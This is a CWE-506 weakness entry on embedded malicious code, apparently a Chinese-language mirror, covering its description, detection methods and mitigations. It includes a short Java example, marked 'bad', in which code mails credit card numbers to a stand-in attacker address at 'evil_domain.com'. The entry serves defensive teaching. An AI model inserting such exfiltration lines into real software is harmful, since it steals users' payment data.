CWE-506 内嵌的恶意代码

Embedded Malicious Code

结构: Simple

Abstraction: Class

状态: Incomplete

被利用可能性: unkown

基本描述

The application contains code that appears to be malicious in nature.

扩展描述

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of an application or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

相关缺陷

  • cwe_Nature: ChildOf cwe_CWE_ID: 912 cwe_View_ID: 699 cwe_Ordinal: Primary

  • cwe_Nature: ChildOf cwe_CWE_ID: 710 cwe_View_ID: 1000 cwe_Ordinal: Primary

常见的影响

范围 影响 注释
['Confidentiality', 'Integrity', 'Availability'] Execute Unauthorized Code or Commands

检测方法

Manual Static Analysis - Binary or Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:
  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies
  • Generated Code Inspection

Dynamic Analysis with Manual Results Interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:
  • Automated Monitored Execution

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:
  • Manual Source Code Review (not inspections)

Automated Static Analysis

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:
  • Origin Analysis

可能的缓解方案

Testing

策略:

Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

示例代码

In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.

bad Java

boolean authorizeCard(String ccn) {

// Authorize credit card.

...

mailCardNumber(ccn, "evil_developer@evil_domain.com");
}

Notes

分类映射

映射的分类名 ImNode ID Fit Mapped Node Name
Landwehr Malicious